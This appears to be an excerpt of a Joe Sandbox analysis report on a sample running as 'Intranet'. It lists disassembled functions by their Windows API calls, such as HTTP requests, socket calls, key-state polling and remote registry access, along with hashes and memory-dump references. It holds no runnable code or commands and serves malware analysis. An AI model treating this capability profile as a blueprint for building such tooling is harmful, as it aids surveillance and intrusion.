                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9ADF
                                                                            • SendMessageW.USER32(?,00000189,?,00000000,?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?), ref: 004F9B0F
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 365058703-1403004172
                                                                            • Opcode ID: 07b09020901165ab8eb36e05330a7b0e1f2856d4165ce523c92fda68c94dd2be
                                                                            • Instruction ID: 65244dec20fa10376a74b6149625c5cc520a40e72f050e08d203d4620a5578de
                                                                            • Opcode Fuzzy Hash: 07b09020901165ab8eb36e05330a7b0e1f2856d4165ce523c92fda68c94dd2be
                                                                            • Instruction Fuzzy Hash: 02212071900108ABCB15ABA1D856EFFBBA8EF45360F10021FF921932E0DA381C0A9668
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00511F18
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00511F3E
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?,00000000), ref: 00511F6E
                                                                            • InternetCloseHandle.WININET(00000000,0000002A,DEADBEEF,00000000), ref: 00511FB5
                                                                              • Part of subcall function 00512B4F: GetLastError.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B64
                                                                              • Part of subcall function 00512B4F: SetEvent.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: 9287097bd718a4d84798c015e43f14962e905b70a70da473bd1023866b549bbf
                                                                            • Instruction ID: 77ca95635c3a10dd2a033fae8781eab57bbfb900de9659227b52971be3852da5
                                                                            • Opcode Fuzzy Hash: 9287097bd718a4d84798c015e43f14962e905b70a70da473bd1023866b549bbf
                                                                            • Instruction Fuzzy Hash: 5A21D0B5504608BFFB119F209C89EFB7BADFB88744F00411AF50592240EB249D559BB5
                                                                            APIs
                                                                              • Part of subcall function 004A2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                              • Part of subcall function 004A2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                              • Part of subcall function 004A2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?,?,00000000,SysAnimate32,00000000,?,?,?,?,?,?,?,00000000), ref: 00526A86
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00526A8D
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00526AA2
                                                                            • DestroyWindow.USER32(?), ref: 00526AAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00507377
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005073AA
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 005073BC
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005073F6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00507444
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00507476
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00507487
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005074C1
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0050B297
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0050B2EB
                                                                            • __swprintf.LIBCMT ref: 0050B304
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00530980), ref: 0050B342
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            APIs
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                              • Part of subcall function 004FAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004FAA6F
                                                                              • Part of subcall function 004FAA52: GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 004FAA82
                                                                              • Part of subcall function 004FAA52: GetCurrentThreadId.KERNEL32 ref: 004FAA89
                                                                              • Part of subcall function 004FAA52: AttachThreadInput.USER32(00000000), ref: 004FAA90
                                                                            • GetFocus.USER32(00530980), ref: 004FAC2A
                                                                              • Part of subcall function 004FAA9B: GetParent.USER32(?), ref: 004FAAA9
                                                                            • GetClassNameW.USER32(?,?,00000100,?), ref: 004FAC73
                                                                            • EnumChildWindows.USER32(?,004FACEB,?,?), ref: 004FAC9B
                                                                            • __swprintf.LIBCMT ref: 004FACB5
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                            • String ID: %s%d
                                                                            • API String ID: 1941087503-1110647743
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00502318
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0051F2F0
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0051F320
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0051F453
                                                                            • CloseHandle.KERNEL32(?), ref: 0051F4D4
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1559183368-0
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0052075D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0052079C
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005207E3
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0052080F
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0052081C
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3440857362-0
                                                                            APIs
                                                                              • Part of subcall function 00518475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005184A0
                                                                            • #23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00516E89
                                                                            • #111.WSOCK32(00000000), ref: 00516EB2
                                                                            • #2.WSOCK32(00000000,?,00000010), ref: 00516EEB
                                                                            • #111.WSOCK32(00000000), ref: 00516EF8
                                                                            • #3.WSOCK32(00000000,00000000), ref: 00516F0C
                                                                            Similarity
                                                                            • API ID: #111
                                                                            • String ID:
                                                                            • API String ID: 568940515-0
APIs
  • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
  • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0051E010
• GetProcAddress.KERNEL32(00000000,?), ref: 0051E093
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0051E0AF
• GetProcAddress.KERNEL32(00000000,?), ref: 0051E0F0
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0051E10A
  • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00507E51,?,?,00000000), ref: 004B4041
  • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00507E51,?,?,00000000,?,?), ref: 004B4065
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0050EC62
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0050EC8B
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0050ECCA
  • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
  • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0050ECEF
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0050ECF7
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
APIs
• GetCursorPos.USER32(?,?,005677B0,?,005677B0,005677B0,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?), ref: 004A2727
• ScreenToClient.USER32(005677B0,?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001), ref: 004A2744
• GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2769
• GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2777
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,004ABCD4,?,?), ref: 004A52E6
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004A534A
• TranslateMessage.USER32(?,?), ref: 004A5356
• DispatchMessageW.USER32(?), ref: 004A5360
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
APIs
• GetWindowRect.USER32(?,?), ref: 004F95E8
• PostMessageW.USER32(?,00000201,00000001,?,?,?), ref: 004F9692
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004F969A
• PostMessageW.USER32(?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004F96A8
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004F96B0
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?,?,?,?,?), ref: 004FBD9D
• SendMessageW.USER32(?,0000000E,00000000,00000000,?,?,?,?), ref: 004FBDBA
• SendMessageW.USER32(?,0000000D,00000001,00000000,?,?,?,?), ref: 004FBDF2
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004FBE18
• _wcsstr.LIBCMT ref: 004FBE22
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
• GetWindowLongW.USER32(?,000000F0,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B804
• SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B829
• SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B841
• GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B86A
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0051155C,00000000), ref: 0052B888
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004F9ED8
  • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
• SendMessageW.USER32(?,0000102C,00000000,00000002,00530980,?,00001004,00000000,00000000), ref: 004F9F0A
• __itow.LIBCMT ref: 004F9F22
• SendMessageW.USER32(?,0000102C,00000000,00000002,00530980,?,00001004,00000000,00000000), ref: 004F9F4A
• __itow.LIBCMT ref: 004F9F5B
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00516159
                                                                            • GetForegroundWindow.USER32 ref: 00516170
                                                                            • GetDC.USER32(00000000), ref: 005161AC
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 005161B8
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 005161F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 1a29e202e2c4d63adaca9a4f2457498d2682883e5d21241cfb6439a2f7d84e6c
                                                                            • Instruction ID: 716bbc870611ebf076da295d6c3266a28c04acd64065963fdfdaaf0ee79d7df0
                                                                            • Opcode Fuzzy Hash: 1a29e202e2c4d63adaca9a4f2457498d2682883e5d21241cfb6439a2f7d84e6c
                                                                            • Instruction Fuzzy Hash: 2E21C375A00204AFD700EF65DD89AAEBBF9FF98310F048469F94A97352CB30AC44DB90
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A1729
                                                                            • SelectObject.GDI32(?,00000000), ref: 004A1738
                                                                            • BeginPath.GDI32(?), ref: 004A174F
                                                                            • SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 004A1778
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 8906cc151720f23a2b90013254bded52e3776159e8a2f315ec33432a04e1067a
                                                                            • Instruction ID: bfd1dcd06c32778b135ac30428dbce5db7e4ff0f897cefc27ab9ca9f0d78c310
                                                                            • Opcode Fuzzy Hash: 8906cc151720f23a2b90013254bded52e3776159e8a2f315ec33432a04e1067a
                                                                            • Instruction Fuzzy Hash: 3621B030804308EBDB108F28DD4876E3BA8E739329F144257F815A72B0D3B59C99EB88
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 678833f896c76db86191bdb6f7971e6aa9d6f3cc256033e2d736b1b352aa2c98
                                                                            • Instruction ID: 68a0d8b52c218bc0fc7bd425f10ff919b17cbc737852ee5aacb5d7568b0c73cb
                                                                            • Opcode Fuzzy Hash: 678833f896c76db86191bdb6f7971e6aa9d6f3cc256033e2d736b1b352aa2c98
                                                                            • Instruction Fuzzy Hash: 5601D272B0010D3BE20076129EC2FBB675CAE613D9F04402FFF0696342E768DE1592E9
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00505075
                                                                            • __beginthreadex.LIBCMT ref: 00505093
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 005050A8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005050BE
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005050C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3824534824-0
                                                                            • Opcode ID: 5b38ce280557569d40475082f675e15b0ca2b0346b1d2c4dd84bd540fcbf91d0
                                                                            • Instruction ID: b498ea74fbf9b2cec7f86767215581e37391906e6cdc712c6151de88be9bf38a
                                                                            • Opcode Fuzzy Hash: 5b38ce280557569d40475082f675e15b0ca2b0346b1d2c4dd84bd540fcbf91d0
                                                                            • Instruction Fuzzy Hash: 2911E97590470C6BC7119BA89C28A9F7FACAB55324F140255F814D33D0D67189089BF0
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,004F8900,?,?,?), ref: 004F8E3C
                                                                            • GetLastError.KERNEL32(?,004F8900,?,?,?), ref: 004F8E46
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,004F8900,?,?,?), ref: 004F8E55
                                                                            • HeapAlloc.KERNEL32(00000000,?,004F8900,?,?,?), ref: 004F8E5C
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,004F8900,?,?,?), ref: 004F8E73
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: 7b4b1bdc7f12ed6621a90ebc4a9a336c5fb28f442d94d2378b5c0bf0698b9422
                                                                            • Instruction ID: d6de85a8c87ee021da568f597e81e2f5de3d57780d81f68fa978bb5c649128b7
                                                                            • Opcode Fuzzy Hash: 7b4b1bdc7f12ed6621a90ebc4a9a336c5fb28f442d94d2378b5c0bf0698b9422
                                                                            • Instruction Fuzzy Hash: 53016D70200308BFDB205FA6DC59D7B7BADEF99754B10056AF949C63A0DB319C14DA60
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0050581B
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00505829
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505831
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0050583B
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: d10968285aedc149b7c5a4a32c8ce2160d08cb3cd6724d66f16d9d5976d2307f
                                                                            • Instruction ID: aa5e47d0eddc6a8a999563d4c5a46782a4b7d5840c4277cce837fdfc2a379b87
                                                                            • Opcode Fuzzy Hash: d10968285aedc149b7c5a4a32c8ce2160d08cb3cd6724d66f16d9d5976d2307f
                                                                            • Instruction Fuzzy Hash: E0013531C01A1D9BCF00ABA5ED589EEBBB8FF18711F108556E901B2280EB309554EBA1
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?,?,004F8073), ref: 004F7D45
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D60
                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D6E
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?), ref: 004F7D7E
                                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D8A
                                                                            Memory Dump Source
